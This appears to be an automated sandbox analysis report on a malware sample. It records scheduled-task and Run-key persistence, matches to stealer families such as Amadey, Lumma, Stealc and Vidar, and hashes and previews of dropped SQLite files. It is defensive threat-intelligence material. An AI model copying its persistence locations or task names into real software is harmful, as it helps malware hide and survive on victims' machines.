Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, spocs.getpocket.com, sanboxland.pro, clientservices.googleapis.com, aus5.mozilla.org, a19.dscg10.akamai.net, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, us-west1.prod.sumo.prod.webservices.mozgcp.net, login.live.com, ipv4only.arpa, config-edge-skype.l-0007.l-msedge.net, wodresomdaymomentum.org, firefox.settings.services.mozilla.com, prod.ads.prod.webservices.mozgcp.net, www.youtube.com, www.gstatic.com, normandy-cdn.services.mozilla.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, star-mini.c10r.facebook.com, www.bing.com, prod.balrog.prod.cloudops.mozgcp.net, assets.msn.com.edgekey.net, fs.microsoft.com, shavar.prod.mozaws.net, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanage
Execution Graph export aborted for target 3b636bd67f.exe, PID 6360 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:42:02	API Interceptor	16553804x Sleep call for process: skotes.exe modified
14:42:30	API Interceptor	7x Sleep call for process: 3b636bd67f.exe modified
14:43:08	API Interceptor	228x Sleep call for process: 8f25543307.exe modified
14:43:32	API Interceptor	4x Sleep call for process: a629a70424.exe modified
14:43:36	API Interceptor	200x Sleep call for process: 9f2ded7baa.exe modified
18:52:10	Task Scheduler	Run new task: skotes path: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
20:42:39	Task Scheduler	Run new task: Gxtuum path: C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe
20:42:42	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs
20:42:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 75e257f622.exe C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe
20:43:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 75e257f622.exe C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe
20:43:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9f2ded7baa.exe C:\Users\user~1\AppData\Local\Temp\1014883001\9f2ded7baa.exe
20:43:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9ffcf1ab77.exe C:\Users\user~1\AppData\Local\Temp\1014884001\9ffcf1ab77.exe
20:43:34	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
20:43:47	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9f2ded7baa.exe C:\Users\user~1\AppData\Local\Temp\1014883001\9f2ded7baa.exe
20:43:55	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9ffcf1ab77.exe C:\Users\user~1\AppData\Local\Temp\1014884001\9ffcf1ab77.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	AyqwnIUrcz.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	Uniswap Sniper Bot With GUI.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	Uniswap Sniper Bot With GUI.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	162.159.61.3

Process:	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BIMO8YMO89RQ\DT2DT0

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BIMO8YMO89RQ\FCTR1D2DT

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BIMO8YMO89RQ\GVS0HV

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BIMO8YMO89RQ\JECTJECTR

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BIMO8YMO89RQ\WTR1NG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BIMO8YMO89RQ\XT2DB1

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08441928760034874
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
MD5:	2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
SHA1:	14DFBE9B28D033542357D98005239D842A16FCFD
SHA-256:	91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
SHA-512:	DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBKJKJDBFIIDHJKEHJEH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBFHDHJK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIDHDGCBFBKECBFHCAFH

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDGIECGI

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1d2a4d66-2828-4a56-b30c-0f2a87816d75.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44691
Entropy (8bit):	6.0950939640458905
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k1xKKGf4PJWblVkvRkN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynGN7VLyMV/YoskFoz
MD5:	8B9B8ED4F9058BEF2B91CC234EAA4BD5
SHA1:	1226F94ACC65160A171BFB8EA05B81213497186D
SHA-256:	832CC840D347FA2FC87880201EC52CF96F1173FECE47B4B992F44EAE11232DF1
SHA-512:	08D274C6C4686E7556C287B42764BE4FE63EF7454E677FAB8AE49E498CADE1CD937EE02F3B6336A5E33219C7FB5F01C0A6CD30B3A44A2C2B004F8DA66C00C82E
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\41de188a-2617-46e1-813c-74ce72cf7028.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44691
Entropy (8bit):	6.0950939640458905
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4k1xKKGf4PJWblVkvRkN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynGN7VLyMV/YoskFoz
MD5:	8B9B8ED4F9058BEF2B91CC234EAA4BD5
SHA1:	1226F94ACC65160A171BFB8EA05B81213497186D
SHA-256:	832CC840D347FA2FC87880201EC52CF96F1173FECE47B4B992F44EAE11232DF1
SHA-512:	08D274C6C4686E7556C287B42764BE4FE63EF7454E677FAB8AE49E498CADE1CD937EE02F3B6336A5E33219C7FB5F01C0A6CD30B3A44A2C2B004F8DA66C00C82E
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9a5ba0ed-76ea-445c-a73c-3ae7d9bdaa2e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44236
Entropy (8bit):	6.089543925871274
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kLTKKGf4SrtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn0t5b7VLyMV/YoskFoz
MD5:	8ECBFB93D2F253C68BDBB11680F83E1B
SHA1:	95D37647D51B616D7F9D325C93EA08EBC9903FC1
SHA-256:	3A6CA0E4B41C9DBE1E639F67A55C94C0DF1E57269E7BF1E98A73E750632EFDDE
SHA-512:	57620B876914A0ABA21D0CDC3944987FD89AA80828C8ADF7B7054BFCDB1997DFF083341188F05568EF4FFB6D2245CF6DA7886AF2FEE663F2E57B56991B86DFDF
Malicious:	false
Reputation:	unknown
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-675C8E47-828.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04721284328522396
Encrypted:	false
SSDEEP:	192:qol0m5tmHnOAUyYuRJ8STlGaDrZX/gLXRUIS8EozTnThb8NMoeRQbhL16n8y08TQ:vl0UtYRHY7jhgXGY1608T2RGOD
MD5:	ECE552973B5D017A81A5C4DDC1DC6E95
SHA1:	9832B1027443E0B1DBFD95806D7720CCED677041
SHA-256:	4D3C4AF4CFA33B8F3984955AA56E4F266E2B32620F73D5C78BC8F353288F515E
SHA-512:	0E87396364825C8D862AE2AAE0AF4EA684768BF0ECC77DADC73169E9E2425BE7E7BB451220D0F38FF1CBA205E351AE1DAF95D625EA57F37C9D60A3BE1703889D
Malicious:	false
Reputation:	unknown
Preview:	...@..@...@.....C.].....@...............`j...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB...Windows NT..10.0.190452l..x86_64..?.......".iyeaan20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........V...... .2.........m...

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.16517681506792
Encrypted:	false
SSDEEP:	3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUnQll:o1rPWVjWZq3RvtNlwBVsJDL7b/3U
MD5:	8DC22414159B9D3CCEDD25E724812F44
SHA1:	24B1CE93D6BA493BB8DA25FD9677C53029C2022F
SHA-256:	D6274AF9433E03990FD32864D41B3C2EBCF8E4735A49A2E2C8E2C8F878D15FEB
SHA-512:	531FBF97B70950261DCEC63116212BB02CBA5254F623FD632FD9A257AF59009B1352F16362283AA3D479F4710EE7D663BBD5FC8700EF4FD5094F8CAA8CBADC30
Malicious:	false
Reputation:	unknown
Preview:	sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Reputation:	unknown
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44236
Entropy (8bit):	6.089543925871274
Encrypted:	false
